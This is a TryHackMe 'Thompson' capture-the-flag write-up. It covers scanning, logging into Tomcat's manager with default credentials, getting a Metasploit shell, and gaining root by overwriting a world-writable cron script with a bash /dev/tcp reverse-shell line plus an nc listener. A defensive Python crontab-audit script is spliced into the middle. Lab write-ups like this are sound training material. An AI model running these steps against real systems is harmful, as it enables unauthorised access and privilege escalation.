Thompson — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Thompson — TryHackMe — WriteUp. Check it out!

First, deploy the machine and scan for open ports with nmap.
nmap -A -T4 -p- -v <ip>

There are 3 open ports: 22 (ssh), 8080 (http) and 8009 (ajp). Let’s access the website on port 8080.

It’s the default Apache Tomcat page. I’ve checked the page source but found nothing valuable. Now I’ll scan for hidden directories using gobuster.
gobuster dir -u http://<ip>:8080 -w /path-to-wordlist

Two directories look suspicious: /host-manager and /manager
First, let’s access /manager
It prompts for a username and password. I don’t know them yet, so I click cancel. Surprisingly, the error page that follows reveals a default credential:

Well let’s try again with tomcat:s3cret

Boom! I’m in. The same credentials also work for /host-manager.

Now I’ll find a way to upload a reverse shell to the web server and gain access. There are 2 ways to do this: gain a shell directly via metasploit, or use metasploit to generate a .war shell and trigger it via the browser.
*Why .war but not .php? Because:

I will use the 1st way.
Start metasploit:
msfdb init && msfconsole
Then search for tomcat exploit:
search tomcat

Now I found a module to use.
use 17

In order to exploit, you need to set the Tomcat username and password (tomcat:s3cret), RHOSTS (the machine ip) and RPORT (8080). Also change LHOST to your VPN ip.
After everything is set, run

Boom! Now I have a meterpreter shell. Move around and get the first flag in /home/jack

Now let’s get root to get our final flag. Input “shell” to spawn a shell. Then use python to spawn a tty shell.
python -c 'import pty;pty.spawn("/bin/bash")'

There is a script called “id.sh”. It writes the output of the id command to test.txt. Read the content of test.txt:

Now I know that there is a cronjob which runs id.sh as root. So let’s check whether I can modify the content of this script.

Yes I can, because its permissions are 777! So let’s replace the content of this script with a reverse shell and wait for the cronjob to run.
cat > id.sh <<EOF
#!/bin/bash
bash -i >& /dev/tcp/<your-vpn-ip>/<port> 0>&1
EOF
Check the content of id.sh again:

Now start a listener on your machine:
nc -lvnp <port>
Wait about a minute and I’m root!
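As an added defensive check (my own example, not code from the write-up), this Python script audits a system crontab for exactly the weakness used above: a script run by root that non-owners can modify. The crontab text and the id.sh/safe.sh files are constructed in a temporary directory.

```python
import os
import shlex
import stat
import tempfile

# Constructed audit: parses system-crontab lines (min hour dom mon dow user command)
# and reports entries whose script file is writable by group/others, or lives in
# a world-writable directory without the sticky bit (so it can be replaced).

def parse_crontab_line(line):
    """Return (user, command) for a system crontab entry, else None."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None  # blank, comment, or VAR=value line
    fields = line.split(None, 6)
    return (fields[5], fields[6]) if len(fields) == 7 else None

def writable_by_non_owner(path):
    """True if group/others can write the file, or others can replace it via its parent dir."""
    mode = os.stat(path).st_mode
    parent = os.stat(os.path.dirname(path) or ".").st_mode
    file_bad = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
    dir_bad = bool(parent & stat.S_IWOTH) and not (parent & stat.S_ISVTX)
    return file_bad or dir_bad

def audit_crontab(text):
    """Return [(user, script_path)] for entries whose script a non-owner could modify."""
    findings = []
    for line in text.splitlines():
        parsed = parse_crontab_line(line)
        if parsed is None:
            continue
        user, command = parsed
        for token in shlex.split(command):  # any absolute path in the command is a candidate
            if token.startswith("/") and os.path.isfile(token) and writable_by_non_owner(token):
                findings.append((user, token))
    return findings

def demo():
    """Build a constructed id.sh (mode 777) beside a safe.sh (mode 755) and audit a sample crontab."""
    tmp = tempfile.mkdtemp()  # created with mode 700, so the parent-directory check stays clean
    for name, mode in {"id.sh": 0o777, "safe.sh": 0o755}.items():
        path = os.path.join(tmp, name)
        with open(path, "w") as f:
            f.write("#!/bin/bash\nid > test.txt\n")
        os.chmod(path, mode)
    crontab = "PATH=/usr/bin\n* * * * * root cd %s && bash %s/id.sh\n* * * * * root %s/safe.sh\n" % (tmp, tmp, tmp)
    return audit_crontab(crontab)  # only id.sh is reported

if __name__ == "__main__":
    print(demo())
```

On a real host, feed it the contents of /etc/crontab and the files under /etc/cron.d to find scripts that should have their permissions tightened.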

Get the final flag:

The end.
If you want to try the 2nd way, which is generating a .war shell and triggering it via the browser, read the article here:
https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/
HAPPY HACKING